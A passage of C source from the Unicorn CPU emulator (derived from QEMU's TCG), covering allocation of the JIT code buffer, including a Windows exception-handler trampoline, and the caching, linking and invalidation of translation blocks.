} if (page1 < page2) { 
page_lock(p1); page_lock(p2); } else { page_lock(p2); page_lock(p1); } } /* Minimum size of the code gen buffer. This number is randomly chosen, but not so small that we can't have a fair number of TB's live. */ #define MIN_CODE_GEN_BUFFER_SIZE (1 * MiB) /* Maximum size of the code gen buffer we'd like to use. Unless otherwise indicated, this is constrained by the range of direct branches on the host cpu, as used by the TCG implementation of goto_tb. */ #if defined(__x86_64__) # define MAX_CODE_GEN_BUFFER_SIZE (2 * GiB) #elif defined(__sparc__) # define MAX_CODE_GEN_BUFFER_SIZE (2 * GiB) #elif defined(__powerpc64__) # define MAX_CODE_GEN_BUFFER_SIZE (2 * GiB) #elif defined(__powerpc__) # define MAX_CODE_GEN_BUFFER_SIZE (32 * MiB) #elif defined(__aarch64__) # define MAX_CODE_GEN_BUFFER_SIZE (2 * GiB) #elif defined(__s390x__) /* We have a +- 4GB range on the branches; leave some slop. */ # define MAX_CODE_GEN_BUFFER_SIZE (3 * GiB) #elif defined(__mips__) /* We have a 256MB branch region, but leave room to make sure the main executable is also within that region. */ # define MAX_CODE_GEN_BUFFER_SIZE (128 * MiB) #else # define MAX_CODE_GEN_BUFFER_SIZE ((size_t)-1) #endif #if TCG_TARGET_REG_BITS == 32 #define DEFAULT_CODE_GEN_BUFFER_SIZE_1 (32 * MiB) #else /* TCG_TARGET_REG_BITS == 64 */ /* * We expect most system emulation to run one or two guests per host. * Users running large scale system emulation may want to tweak their * runtime setup via the tb-size control on the command line. */ #define DEFAULT_CODE_GEN_BUFFER_SIZE_1 (1 * GiB) #endif #define DEFAULT_CODE_GEN_BUFFER_SIZE \ (DEFAULT_CODE_GEN_BUFFER_SIZE_1 < MAX_CODE_GEN_BUFFER_SIZE \ ? DEFAULT_CODE_GEN_BUFFER_SIZE_1 : MAX_CODE_GEN_BUFFER_SIZE) static inline size_t size_code_gen_buffer(size_t tb_size) { /* Size the buffer. */ if (tb_size == 0) { tb_size = DEFAULT_CODE_GEN_BUFFER_SIZE; } if (tb_size < MIN_CODE_GEN_BUFFER_SIZE) { tb_size = MIN_CODE_GEN_BUFFER_SIZE; } if (tb_size > MAX_CODE_GEN_BUFFER_SIZE) { tb_size = MAX_CODE_GEN_BUFFER_SIZE; } return tb_size; } #ifdef __mips__ /* In order to use J and JAL within the code_gen_buffer, we require that the buffer not cross a 256MB boundary. */ static inline bool cross_256mb(void *addr, size_t size) { return ((uintptr_t)addr ^ ((uintptr_t)addr + size)) & ~0x0ffffffful; } /* We weren't able to allocate a buffer without crossing that boundary, so make do with the larger portion of the buffer that doesn't cross. Returns the new base of the buffer, and adjusts code_gen_buffer_size. */ static inline void *split_cross_256mb(TCGContext *tcg_ctx, void *buf1, size_t size1) { void *buf2 = (void *)(((uintptr_t)buf1 + size1) & ~0x0ffffffful); size_t size2 = buf1 + size1 - buf2; size1 = buf2 - buf1; if (size1 < size2) { size1 = size2; buf1 = buf2; } tcg_ctx->code_gen_buffer_size = size1; return buf1; } #endif #ifdef USE_STATIC_CODE_GEN_BUFFER static uint8_t static_code_gen_buffer[DEFAULT_CODE_GEN_BUFFER_SIZE] __attribute__((aligned(CODE_GEN_ALIGN))); static inline void *alloc_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; void *buf = static_code_gen_buffer; void *end = static_code_gen_buffer + sizeof(static_code_gen_buffer); size_t size; /* page-align the beginning and end of the buffer */ buf = QEMU_ALIGN_PTR_UP(buf, uc->qemu_real_host_page_size); end = QEMU_ALIGN_PTR_DOWN(end, uc->qemu_real_host_page_size); size = end - buf; /* Honor a command-line option limiting the size of the buffer. 
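   (Clarifying note, not in the original comment:) if the user asked for
   a smaller tb_size than the static buffer provides, clamp to the
   requested size, keeping the result host-page aligned via
   QEMU_ALIGN_DOWN, as the check below does.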
*/ if (size > tcg_ctx->code_gen_buffer_size) { size = QEMU_ALIGN_DOWN(tcg_ctx->code_gen_buffer_size, uc->qemu_real_host_page_size); } tcg_ctx->code_gen_buffer_size = size; #ifdef __mips__ if (cross_256mb(buf, size)) { buf = split_cross_256mb(tcg_ctx, buf, size); size = tcg_ctx->code_gen_buffer_size; } #endif if (qemu_mprotect_rwx(buf, size)) { abort(); } qemu_madvise(buf, size, QEMU_MADV_HUGEPAGE); return buf; } #elif defined(_WIN32) #define COMMIT_COUNT (1024) // Commit 4MB per exception #define CLOSURE_SIZE (4096) #ifdef _WIN64 static LONG code_gen_buffer_handler(PEXCEPTION_POINTERS ptr, struct uc_struct *uc) #else /* The first two DWORD or smaller arguments that are found in the argument list from left to right are passed in ECX and EDX registers; all other arguments are passed on the stack from right to left. */ static LONG __fastcall code_gen_buffer_handler(PEXCEPTION_POINTERS ptr, struct uc_struct* uc) #endif { PEXCEPTION_RECORD record = ptr->ExceptionRecord; if (record->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) { uint8_t* base = (uint8_t*)(record->ExceptionInformation[1]); uint8_t* left = uc->tcg_ctx->initial_buffer; uint8_t* right = left + uc->tcg_ctx->initial_buffer_size; if (left && base >= left && base < right) { // It's our region uint8_t* base_end = base + COMMIT_COUNT * 4096; uint32_t size = COMMIT_COUNT * 4096; if (base_end >= right) { size = base_end - base; // whoops, we are almost run out of memory! Commit all instead } if (VirtualAlloc(base, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)) { return EXCEPTION_CONTINUE_EXECUTION; } else { return EXCEPTION_CONTINUE_SEARCH; } } } return EXCEPTION_CONTINUE_SEARCH; } static inline void may_remove_handler(struct uc_struct *uc) { if (uc->seh_closure) { if (uc->seh_handle) { RemoveVectoredExceptionHandler(uc->seh_handle); } VirtualFree(uc->seh_closure, 0, MEM_RELEASE); } } static inline void *alloc_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; size_t size = tcg_ctx->code_gen_buffer_size; uint8_t *closure, *data; uint8_t *ptr; void* handler = code_gen_buffer_handler; may_remove_handler(uc); // Naive trampoline implementation closure = VirtualAlloc(NULL, CLOSURE_SIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (!closure) { return NULL; } uc->seh_closure = closure; data = closure + CLOSURE_SIZE /2; #ifdef _WIN64 ptr = closure; *ptr = 0x48; // REX.w ptr += 1; *ptr = 0xb8; // mov rax ptr += 1; memcpy(ptr, &data, 8); // mov rax, &data ptr += 8; // ; rax = &data // mov [rax], rdx ; save rdx // mov rdx, [rax+0x8] ; move uc pointer to 2nd arg // sub rsp, 0x10; reserve 2 slots as ms fastcall requires // call [rax + 0x10] ; go to handler const char tramp[] = "\x48\x89\x10\x48\x8b\x50\x08\x48\x83\xec\x10\xff\x50\x10"; memcpy(ptr, (void*)tramp, sizeof(tramp) - 1); // Note last zero! 
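/*
 * (Descriptive note added for clarity:) at this point the closure holds
 * "mov rax, &data" followed by the tramp bytes above: it saves rdx into
 * data[0], loads the uc pointer from data[0x8] into rdx (the second
 * argument register; rcx already holds the PEXCEPTION_POINTERS), then
 * reserves two 8-byte stack slots and calls the real handler stored at
 * data[0x10]. The bytes emitted next restore rdx and return.
 */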
ptr += sizeof(tramp) - 1; *ptr = 0x48; // REX.w ptr += 1; *ptr = 0xba; // mov rdx ptr += 1; memcpy(ptr, &data, 8); // mov rdx, &data ptr += 8; // ; rdx = &data // add rsp, 0x10 ; clean stack // mov rdx, [rdx] ; restore rdx // ret const char tramp2[] = "\x48\x83\xc4\x10\x48\x8b\x12\xc3"; memcpy(ptr, (void*)tramp2, sizeof(tramp2) - 1); memcpy(data + 0x8, (void*)&uc, 8); memcpy(data + 0x10, (void*)&handler, 8); #else ptr = closure; *ptr = 0xb8; // mov eax ptr += 1; memcpy(ptr, (void*)&data, 4); // mov eax, &data ptr += 4; // ; eax = &data // mov [eax], edx; save edx // mov [eax+0x4], ecx; save ecx // mov ecx, [esp+4]; get ptr to exception because of cdecl // mov edx, [eax+0x8]; get ptr to uc // call [eax + 0xC]; get ptr to our handler, it's fastcall so we don't clean stack const char tramp[] = "\x89\x10\x89\x48\x04\x8b\x4c\x24\x04\x8b\x50\x08\xff\x50\x0c"; memcpy(ptr, (void*)tramp, sizeof(tramp) - 1); ptr += sizeof(tramp) - 1; *ptr = 0xb9; // mov ecx ptr += 1; memcpy(ptr, (void*)&data, 4); // mov ecx, &data ptr += 4; // mov edx, [ecx] ; restore edx // mov ecx, [ecx+4] ; restore ecx // ret const char tramp2[] = "\x8b\x11\x8b\x49\x04\xc3"; memcpy(ptr, (void*)tramp2, sizeof(tramp2) - 1); memcpy(data + 0x8, (void*)&uc, 4); memcpy(data + 0xC, (void*)&handler, 4); #endif uc->seh_handle = AddVectoredExceptionHandler(0, (PVECTORED_EXCEPTION_HANDLER)closure); if (!uc->seh_handle) { VirtualFree(uc->seh_closure, 0, MEM_RELEASE); uc->seh_closure = NULL; return NULL; } return VirtualAlloc(NULL, size, MEM_RESERVE, PAGE_EXECUTE_READWRITE); } void free_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; if (tcg_ctx->initial_buffer) { may_remove_handler(uc); VirtualFree(tcg_ctx->initial_buffer, 0, MEM_RELEASE); } } #else void free_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; if (tcg_ctx->initial_buffer) { if (munmap(tcg_ctx->initial_buffer, tcg_ctx->initial_buffer_size)) { perror("fail code_gen_buffer"); } } } static inline void *alloc_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int prot = PROT_WRITE | PROT_READ | PROT_EXEC; int flags = MAP_PRIVATE | MAP_ANONYMOUS; size_t size = tcg_ctx->code_gen_buffer_size; void *buf; #ifdef USE_MAP_JIT flags |= MAP_JIT; #endif buf = mmap(NULL, size, prot, flags, -1, 0); if (buf == MAP_FAILED) { return NULL; } #ifdef __mips__ if (cross_256mb(buf, size)) { /* * Try again, with the original still mapped, to avoid re-acquiring * the same 256mb crossing. */ size_t size2; void *buf2 = mmap(NULL, size, prot, flags, -1, 0); switch ((int)(buf2 != MAP_FAILED)) { case 1: if (!cross_256mb(buf2, size)) { /* Success! Use the new buffer. */ munmap(buf, size); break; } /* Failure. Work with what we had. */ munmap(buf2, size); /* fallthru */ default: /* Split the original buffer. Free the smaller half. */ buf2 = split_cross_256mb(tcg_ctx, buf, size); size2 = tcg_ctx->code_gen_buffer_size; if (buf == buf2) { munmap(buf + size2, size - size2); } else { munmap(buf, size - size2); } size = size2; break; } buf = buf2; } #endif /* Request large pages for the buffer. 
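   (Descriptive note added for clarity:) this is advisory only;
   qemu_madvise() forwards QEMU_MADV_HUGEPAGE to the host
   madvise(MADV_HUGEPAGE) where supported and is a no-op elsewhere, so
   its result is deliberately ignored.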
*/ qemu_madvise(buf, size, QEMU_MADV_HUGEPAGE); return buf; } #endif /* USE_STATIC_CODE_GEN_BUFFER, WIN32, POSIX */ static inline void code_gen_alloc(struct uc_struct *uc, size_t tb_size) { TCGContext *tcg_ctx = uc->tcg_ctx; tcg_ctx->code_gen_buffer_size = size_code_gen_buffer(tb_size); tcg_ctx->code_gen_buffer = alloc_code_gen_buffer(uc); tcg_ctx->initial_buffer = tcg_ctx->code_gen_buffer; tcg_ctx->initial_buffer_size = tcg_ctx->code_gen_buffer_size; uc->tcg_buffer_size = tcg_ctx->initial_buffer_size; if (tcg_ctx->code_gen_buffer == NULL) { fprintf(stderr, "Could not allocate dynamic translator buffer\n"); exit(1); } } static bool tb_cmp(struct uc_struct *uc, const void *ap, const void *bp) { const TranslationBlock *a = ap; const TranslationBlock *b = bp; return a->pc == b->pc && a->cs_base == b->cs_base && a->flags == b->flags && (tb_cflags(a) & CF_HASH_MASK) == (tb_cflags(b) & CF_HASH_MASK) && a->trace_vcpu_dstate == b->trace_vcpu_dstate && a->page_addr[0] == b->page_addr[0] && a->page_addr[1] == b->page_addr[1]; } static void tb_htable_init(struct uc_struct *uc) { unsigned int mode = QHT_MODE_AUTO_RESIZE; qht_init(&uc->tcg_ctx->tb_ctx.htable, tb_cmp, CODE_GEN_HTABLE_SIZE, mode); } static void uc_tb_flush(struct uc_struct *uc) { tb_exec_unlock(uc); tb_flush(uc->cpu); tb_exec_lock(uc); } static void uc_invalidate_tb(struct uc_struct *uc, uint64_t start_addr, size_t len) { tb_page_addr_t start, end; uc->nested_level++; if (sigsetjmp(uc->jmp_bufs[uc->nested_level - 1], 0) != 0) { // We may get a cpu fault in get_page_addr_code; ignore it. uc->nested_level--; return; } // GPA to ram addr // https://raw.githubusercontent.com/android/platform_external_qemu/master/docs/QEMU-MEMORY-MANAGEMENT.TXT // start_addr : GPA // start (returned): ram addr // (GPA -> HVA via memory_region_get_ram_addr(mr) + GPA + block->host, // GVA -> GPA via tlb & softmmu // HVA -> HPA via host mmu) start = get_page_addr_code(uc->cpu->env_ptr, start_addr) & (target_ulong)(-1); uc->nested_level--; // For 32bit target. end = (start + len) & (target_ulong)(-1); // We get a wrap? if (start > end) { return; } tb_invalidate_phys_range(uc, start, end); } static uc_err uc_gen_tb(struct uc_struct *uc, uint64_t addr, uc_tb *out_tb) { TranslationBlock *tb; target_ulong cs_base, pc; CPUState *cpu = uc->cpu; CPUArchState *env = (CPUArchState *)cpu->env_ptr; uint32_t flags; uint32_t hash; uint32_t cflags = cpu->cflags_next_tb; if (cflags == -1) { cflags = curr_cflags(); } cpu_get_tb_cpu_state(env, &pc, &cs_base, &flags); // Unicorn: Our hack here. pc = addr; hash = tb_jmp_cache_hash_func(env->uc, pc); tb = cpu->tb_jmp_cache[hash]; cflags &= ~CF_CLUSTER_MASK; cflags |= ((uint32_t)cpu->cluster_index) << CF_CLUSTER_SHIFT; if (unlikely(!(tb && tb->pc == pc && tb->cs_base == cs_base && tb->flags == flags && tb->trace_vcpu_dstate == *cpu->trace_dstate && (tb_cflags(tb) & (CF_HASH_MASK | CF_INVALID)) == cflags))) { tb = tb_htable_lookup(cpu, pc, cs_base, flags, cflags); cpu->tb_jmp_cache[hash] = tb; if (tb == NULL) { mmap_lock(); tb = tb_gen_code(cpu, pc, cs_base, flags, cflags); mmap_unlock(); /* We add the TB in the virtual pc hash table for the fast lookup */ cpu->tb_jmp_cache[hash] = tb; } } // If we still couldn't generate a TB, it must be out of memory. if (tb == NULL) { return UC_ERR_NOMEM; } if (out_tb != NULL) { UC_TB_COPY(out_tb, tb); } return UC_ERR_OK; } /* Must be called before using the QEMU cpus. 'tb_size' is the size (in bytes) allocated to the translation buffer. Zero means default size. 
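   (Illustrative note added for clarity:) an embedder that passes
   tb_size == 0 gets DEFAULT_CODE_GEN_BUFFER_SIZE, which
   size_code_gen_buffer() then clamps to the range
   [MIN_CODE_GEN_BUFFER_SIZE, MAX_CODE_GEN_BUFFER_SIZE] defined above.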
*/ void tcg_exec_init(struct uc_struct *uc, uint32_t tb_size) { /* remove tcg object. init here. */ /* tcg class init: tcg-all.c:tcg_accel_class_init(), skip all. */ /* tcg object init: tcg-all.c:tcg_accel_instance_init(), skip all. */ /* tcg init: tcg-all.c: tcg_init(), skip all. */ /* run tcg_exec_init() here. */ uc->tcg_ctx = g_malloc(sizeof(TCGContext)); tcg_context_init(uc->tcg_ctx); uc->tcg_ctx->uc = uc; page_init(uc); tb_htable_init(uc); code_gen_alloc(uc, tb_size); tb_exec_unlock(uc); tcg_prologue_init(uc->tcg_ctx); tb_exec_lock(uc); /* cpu_interrupt_handler is not used in uc1 */ uc->l1_map = g_malloc0(sizeof(void *) * V_L1_MAX_SIZE); /* Invalidate / Cache TBs */ uc->uc_invalidate_tb = uc_invalidate_tb; uc->uc_gen_tb = uc_gen_tb; uc->tb_flush = uc_tb_flush; /* Inline hooks optimization */ uc->add_inline_hook = uc_add_inline_hook; uc->del_inline_hook = uc_del_inline_hook; } /* call with @p->lock held */ static inline void invalidate_page_bitmap(PageDesc *p) { assert_page_locked(p); g_free(p->code_bitmap); p->code_bitmap = NULL; p->code_write_count = 0; } static void tb_clean_internal(void **p, int x) { int i; void **q; if (x <= 1) { for (i = 0; i < V_L2_SIZE; i++) { q = p[i]; if (q) { g_free(q); } } g_free(p); } else { for (i = 0; i < V_L2_SIZE; i++) { q = p[i]; if (q) { tb_clean_internal(q, x - 1); } } g_free(p); } } void tb_cleanup(struct uc_struct *uc) { int i, x; void **p; if (uc) { if (uc->l1_map) { x = uc->v_l2_levels; if (x <= 0) { for (i = 0; i < uc->v_l1_size; i++) { p = uc->l1_map[i]; if (p) { g_free(p); uc->l1_map[i] = NULL; } } } else { for (i = 0; i < uc->v_l1_size; i++) { p = uc->l1_map[i]; if (p) { tb_clean_internal(p, x); uc->l1_map[i] = NULL; } } } } } } /* Set to NULL all the 'first_tb' fields in all PageDescs. */ static void page_flush_tb_1(struct uc_struct *uc, int level, void **lp) { int i; if (*lp == NULL) { return; } if (level == 0) { PageDesc *pd = *lp; for (i = 0; i < V_L2_SIZE; ++i) { page_lock(&pd[i]); pd[i].first_tb = (uintptr_t)NULL; invalidate_page_bitmap(pd + i); page_unlock(&pd[i]); } } else { void **pp = *lp; for (i = 0; i < V_L2_SIZE; ++i) { page_flush_tb_1(uc, level - 1, pp + i); } } } static void page_flush_tb(struct uc_struct *uc) { int i, l1_sz = uc->v_l1_size; for (i = 0; i < l1_sz; i++) { page_flush_tb_1(uc, uc->v_l2_levels, uc->l1_map + i); } } #if 0 static gboolean tb_host_size_iter(gpointer key, gpointer value, gpointer data) { const TranslationBlock *tb = value; size_t *size = data; *size += tb->tc.size; return false; } #endif /* flush all the translation blocks */ static void do_tb_flush(CPUState *cpu, run_on_cpu_data tb_flush_count) { mmap_lock(); /* If it has already been done on request of another CPU, * just retry. */ if (cpu->uc->tcg_ctx->tb_ctx.tb_flush_count != tb_flush_count.host_int) { goto done; } #if 0 if (DEBUG_TB_FLUSH_GATE) { size_t nb_tbs = tcg_nb_tbs(cpu->uc->tcg_ctx); size_t host_size = 0; tcg_tb_foreach(cpu->uc->tcg_ctx, tb_host_size_iter, &host_size); //printf("qemu: flush code_size=%zu nb_tbs=%zu avg_tb_size=%zu\n", // tcg_code_size(cpu->uc->tcg_ctx), nb_tbs, nb_tbs > 0 ? 
host_size / nb_tbs : 0); } CPU_FOREACH(cpu) { cpu_tb_jmp_cache_clear(cpu); } #else cpu_tb_jmp_cache_clear(cpu); #endif qht_reset_size(cpu->uc, &cpu->uc->tcg_ctx->tb_ctx.htable, CODE_GEN_HTABLE_SIZE); page_flush_tb(cpu->uc); tcg_region_reset_all(cpu->uc->tcg_ctx); /* XXX: flush processor icache at this point if cache flush is expensive */ cpu->uc->tcg_ctx->tb_ctx.tb_flush_count = cpu->uc->tcg_ctx->tb_ctx.tb_flush_count + 1; done: mmap_unlock(); } void tb_flush(CPUState *cpu) { unsigned tb_flush_count = cpu->uc->tcg_ctx->tb_ctx.tb_flush_count; do_tb_flush(cpu, RUN_ON_CPU_HOST_INT(tb_flush_count)); } /* * user-mode: call with mmap_lock held * !user-mode: call with @pd->lock held */ static inline void tb_page_remove(PageDesc *pd, TranslationBlock *tb) { TranslationBlock *tb1; uintptr_t *pprev; unsigned int n1; assert_page_locked(pd); pprev = &pd->first_tb; PAGE_FOR_EACH_TB(pd, tb1, n1) { if (tb1 == tb) { *pprev = tb1->page_next[n1]; return; } pprev = &tb1->page_next[n1]; } g_assert_not_reached(); } /* remove @orig from its @n_orig-th jump list */ static inline void tb_remove_from_jmp_list(TranslationBlock *orig, int n_orig) { uintptr_t ptr, ptr_locked; TranslationBlock *dest; TranslationBlock *tb; uintptr_t *pprev; int n; /* mark the LSB of jmp_dest[] so that no further jumps can be inserted */ ptr = atomic_or_fetch(&orig->jmp_dest[n_orig], 1); dest = (TranslationBlock *)(ptr & ~1); if (dest == NULL) { return; } ptr_locked = orig->jmp_dest[n_orig]; if (ptr_locked != ptr) { /* * The only possibility is that the jump was unlinked via * tb_jump_unlink(dest). Seeing here another destination would be a bug, * because we set the LSB above. */ g_assert(ptr_locked == 1 && dest->cflags & CF_INVALID); return; } /* * We first acquired the lock, and since the destination pointer matches, * we know for sure that @orig is in the jmp list. */ pprev = &dest->jmp_list_head; TB_FOR_EACH_JMP(dest, tb, n) { if (tb == orig && n == n_orig) { *pprev = tb->jmp_list_next[n]; /* no need to set orig->jmp_dest[n]; setting the LSB was enough */ return; } pprev = &tb->jmp_list_next[n]; } g_assert_not_reached(); } /* reset the jump entry 'n' of a TB so that it is not chained to another TB */ static inline void tb_reset_jump(TranslationBlock *tb, int n) { uintptr_t addr = (uintptr_t)((char *)tb->tc.ptr + tb->jmp_reset_offset[n]); tb_set_jmp_target(tb, n, addr); } /* remove any jumps to the TB */ static inline void tb_jmp_unlink(TranslationBlock *dest) { TranslationBlock *tb; int n; TB_FOR_EACH_JMP(dest, tb, n) { tb_reset_jump(tb, n); #ifdef _MSC_VER atomic_and((long *)&tb->jmp_dest[n], (uintptr_t)NULL | 1); #else atomic_and(&tb->jmp_dest[n], (uintptr_t)NULL | 1); #endif /* No need to clear the list entry; setting the dest ptr is enough */ } dest->jmp_list_head = (uintptr_t)NULL; } /* * In user-mode, call with mmap_lock held. * In !user-mode, if @rm_from_page_list is set, call with the TB's pages' * locks held. 
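 * (Descriptive summary added for clarity:) invalidation proceeds by
 * marking the TB with CF_INVALID, removing it from the physical-pc hash
 * table and, if requested, from its page lists, purging it from the
 * per-CPU tb_jmp_cache, and finally unlinking its two outgoing jump
 * list entries and any remaining incoming jumps.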
*/ static void do_tb_phys_invalidate(TCGContext *tcg_ctx, TranslationBlock *tb, bool rm_from_page_list) { CPUState *cpu = tcg_ctx->uc->cpu; struct uc_struct *uc = tcg_ctx->uc; PageDesc *p; uint32_t h; tb_page_addr_t phys_pc; bool code_gen_locked; assert_memory_lock(); code_gen_locked = tb_exec_is_locked(uc); tb_exec_unlock(uc); /* make sure no further incoming jumps will be chained to this TB */ tb->cflags = tb->cflags | CF_INVALID; /* remove the TB from the hash list */ phys_pc = tb->page_addr[0] + (tb->pc & ~TARGET_PAGE_MASK); h = tb_hash_func(phys_pc, tb->pc, tb->flags, tb_cflags(tb) & CF_HASH_MASK, tb->trace_vcpu_dstate); if (!(tb->cflags & CF_NOCACHE) && !qht_remove(&tcg_ctx->tb_ctx.htable, tb, h)) { tb_exec_change(uc, code_gen_locked); return; } /* remove the TB from the page list */ if (rm_from_page_list) { p = page_find(tcg_ctx->uc, tb->page_addr[0] >> TARGET_PAGE_BITS); tb_page_remove(p, tb); invalidate_page_bitmap(p); if (tb->page_addr[1] != -1) { p = page_find(tcg_ctx->uc, tb->page_addr[1] >> TARGET_PAGE_BITS); tb_page_remove(p, tb); invalidate_page_bitmap(p); } } /* remove the TB from the hash list */ h = tb_jmp_cache_hash_func(uc, tb->pc); if (cpu->tb_jmp_cache[h] == tb) { cpu->tb_jmp_cache[h] = NULL; } /* suppress this TB from the two jump lists */ tb_remove_from_jmp_list(tb, 0); tb_remove_from_jmp_list(tb, 1); /* suppress any remaining jumps to this TB */ tb_jmp_unlink(tb); tcg_ctx->tb_phys_invalidate_count = tcg_ctx->tb_phys_invalidate_count + 1; tb_exec_change(uc, code_gen_locked); } static void tb_phys_invalidate__locked(TCGContext *tcg_ctx, TranslationBlock *tb) { do_tb_phys_invalidate(tcg_ctx, tb, true); } /* invalidate one TB * * Called with mmap_lock held in user-mode. */ void tb_phys_invalidate(TCGContext *tcg_ctx, TranslationBlock *tb, tb_page_addr_t page_addr) { if (page_addr == -1 && tb->page_addr[0] != -1) { page_lock_tb(tcg_ctx->uc, tb); do_tb_phys_invalidate(tcg_ctx, tb, true); page_unlock_tb(tcg_ctx->uc, tb); } else { do_tb_phys_invalidate(tcg_ctx, tb, false); } } /* call with @p->lock held */ static void build_page_bitmap(struct uc_struct *uc, PageDesc *p) { int n, tb_start, tb_end; TranslationBlock *tb; assert_page_locked(p); p->code_bitmap = bitmap_new(TARGET_PAGE_SIZE); PAGE_FOR_EACH_TB(p, tb, n) { /* NOTE: this is subtle as a TB may span two physical pages */ if (n == 0) { /* NOTE: tb_end may be after the end of the page, but it is not a problem */ tb_start = tb->pc & ~TARGET_PAGE_MASK; tb_end = tb_start + tb->size; if (tb_end > TARGET_PAGE_SIZE) { tb_end = TARGET_PAGE_SIZE; } } else { tb_start = 0; tb_end = ((tb->pc + tb->size) & ~TARGET_PAGE_MASK); } qemu_bitmap_set(p->code_bitmap, tb_start, tb_end - tb_start); } } /* add the tb in the target page and protect it if necessary * * Called with mmap_lock held for user-mode emulation. * Called with @p->lock held in !user-mode. */ static inline void tb_page_add(struct uc_struct *uc, PageDesc *p, TranslationBlock *tb, unsigned int n, tb_page_addr_t page_addr) { bool page_already_protected; assert_page_locked(p); tb->page_addr[n] = page_addr; tb->page_next[n] = p->first_tb; page_already_protected = p->first_tb != (uintptr_t)NULL; p->first_tb = (uintptr_t)tb | n; invalidate_page_bitmap(p); /* if some code is already present, then the pages are already protected. So we handle the case where only the first TB is allocated in a physical page */ if (!page_already_protected) { tlb_protect_code(uc, page_addr); } } /* add a new TB and link it to the physical page tables. 
phys_page2 is * (-1) to indicate that only one page contains the TB. * * Called with mmap_lock held for user-mode emulation. * * Returns a pointer @tb, or a pointer to an existing TB that matches @tb. * Note that in !user-mode, another thread might have already added a TB * for the same block of guest code that @tb corresponds to. In that case, * the caller should discard the original @tb, and use instead the returned TB. */ static TranslationBlock * tb_link_page(struct uc_struct *uc, TranslationBlock *tb, tb_page_addr_t phys_pc, tb_page_addr_t phys_page2) { PageDesc *p; PageDesc *p2 = NULL; assert_memory_lock(); if (phys_pc == -1) { /* * If the TB is not associated with a physical RAM page then * it must be a temporary one-insn TB, and we have nothing to do * except fill in the page_addr[] fields. */ assert(tb->cflags & CF_NOCACHE); tb->page_addr[0] = tb->page_addr[1] = -1; return tb; } /* * Add the TB to the page list, acquiring first the pages' locks. * We keep the locks held until after inserting the TB in the hash table, * so that if the insertion fails we know for sure that the TBs are still * in the page descriptors. * Note that inserting into the hash table first isn't an option, since * we can only insert TBs that are fully initialized. */ page_lock_pair(uc, &p, phys_pc, &p2, phys_page2, 1); tb_page_add(uc, p, tb, 0, phys_pc & TARGET_PAGE_MASK); if (p2) { tb_page_add(uc, p2, tb, 1, phys_page2); } else { tb->page_addr[1] = -1; } if (!(tb->cflags & CF_NOCACHE)) { void *existing_tb = NULL; uint32_t h; /* add in the hash table */ h = tb_hash_func(phys_pc, tb->pc, tb->flags, tb->cflags & CF_HASH_MASK, tb->trace_vcpu_dstate); tb->hash = h; // unicorn needs this so it can remove this tb qht_insert(uc, &uc->tcg_ctx->tb_ctx.htable, tb, h, &existing_tb); /* remove TB from the page(s) if we couldn't insert it */ if (unlikely(existing_tb)) { tb_page_remove(p, tb); invalidate_page_bitmap(p); if (p2) { tb_page_remove(p2, tb); invalidate_page_bitmap(p2); } tb = existing_tb; } } if (p2 && p2 != p) { page_unlock(p2); } page_unlock(p); return tb; } /* Called with mmap_lock held for user mode emulation. */ TranslationBlock *tb_gen_code(CPUState *cpu, target_ulong pc, target_ulong cs_base, uint32_t flags, int cflags) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif TCGContext *tcg_ctx = cpu->uc->tcg_ctx; CPUArchState *env = cpu->env_ptr; TranslationBlock *tb, *existing_tb; tb_page_addr_t phys_pc, phys_page2; target_ulong virt_page2; tcg_insn_unit *gen_code_buf; int gen_code_size, search_size, max_insns; assert_memory_lock(); #ifdef HAVE_PTHREAD_JIT_PROTECT tb_exec_unlock(cpu->uc); #endif phys_pc = get_page_addr_code(env, pc); if (phys_pc == -1) { /* Generate a temporary TB; do not cache */ cflags |= CF_NOCACHE; } cflags &= ~CF_CLUSTER_MASK; cflags |= ((uint32_t)cpu->cluster_index) << CF_CLUSTER_SHIFT; max_insns = cflags & CF_COUNT_MASK; if (max_insns == 0) { max_insns = CF_COUNT_MASK; } if (max_insns > TCG_MAX_INSNS) { max_insns = TCG_MAX_INSNS; } if (cpu->singlestep_enabled) { max_insns = 1; } buffer_overflow: tb = tcg_tb_alloc(tcg_ctx); if (unlikely(!tb)) { /* flush must be done */ tb_flush(cpu); mmap_unlock(); /* Make the execution loop process the flush as soon as possible. 
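   (Descriptive note added for clarity:) raising EXCP_INTERRUPT below
   does not deliver a guest interrupt; it merely forces cpu_loop_exit()
   back to the outer execution loop so the just-requested flush is
   observed before this block is retranslated.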
*/ cpu->exception_index = EXCP_INTERRUPT; cpu_loop_exit(cpu); } gen_code_buf = tcg_ctx->code_gen_ptr; tb->tc.ptr = gen_code_buf; tb->pc = pc; tb->cs_base = cs_base; tb->flags = flags; tb->cflags = cflags; tb->orig_tb = NULL; tb->trace_vcpu_dstate = *cpu->trace_dstate; tcg_ctx->tb_cflags = cflags; tb_overflow: tcg_func_start(tcg_ctx); tcg_ctx->cpu = env_cpu(env); UC_TRACE_START(UC_TRACE_TB_TRANS); gen_intermediate_code(cpu, tb, max_insns); UC_TRACE_END(UC_TRACE_TB_TRANS, "[uc] translate tb 0x%" PRIx64 ": ", tb->pc); tcg_ctx->cpu = NULL; /* generate machine code */ tb->jmp_reset_offset[0] = TB_JMP_RESET_OFFSET_INVALID; tb->jmp_reset_offset[1] = TB_JMP_RESET_OFFSET_INVALID; tcg_ctx->tb_jmp_reset_offset = tb->jmp_reset_offset; if (TCG_TARGET_HAS_direct_jump) { tcg_ctx->tb_jmp_insn_offset = tb->jmp_target_arg; tcg_ctx->tb_jmp_target_addr = NULL; } else { tcg_ctx->tb_jmp_insn_offset = NULL; tcg_ctx->tb_jmp_target_addr = tb->jmp_target_arg; } gen_code_size = tcg_gen_code(tcg_ctx, tb); if (unlikely(gen_code_size < 0)) { switch (gen_code_size) { case -1: /* * Overflow of code_gen_buffer, or the current slice of it. * * TODO: We don't need to re-do 